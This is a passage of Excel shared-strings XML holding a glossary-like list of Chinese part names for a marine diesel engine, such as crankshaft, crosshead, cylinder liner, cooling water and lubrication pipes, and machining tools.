        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全模块原理图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制插件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却元件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器冷却水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器箱体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器体育管系（背面）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水回水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水排水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水进口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水出口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水进水总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>坐标尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜管方案</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车钟指令对应转速</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆沉头螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联接螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联结接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖吊装板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖和吊板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半段盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两段式盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字槽盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>托架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊车轨道</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄角度标识</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴角度传感器单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱门</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴，推力轴承工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴检验工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴检验工装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横臂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横肋</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头油泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉形扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弧线进油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座板材下料方案</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配器用铣刀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管及管座铣刀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油管铣刀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刀架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用铣刀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮刀具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸冷却水出口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑驱动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油泵布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺孔圆柱销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹圆柱销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体仰视</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体凸轮轴侧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体剖面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体中间体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两半式油缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸冷却水浸水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸冷却水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖平台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体输出端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体自由端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体排气侧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体俯视</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半油缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体中间段</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体组图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套定位销组</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套带隔热材</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸下部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸油进油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸油伴热系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸上部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱体滚珠轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阻尼件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>死点指针</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>怠速</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>封头</t>
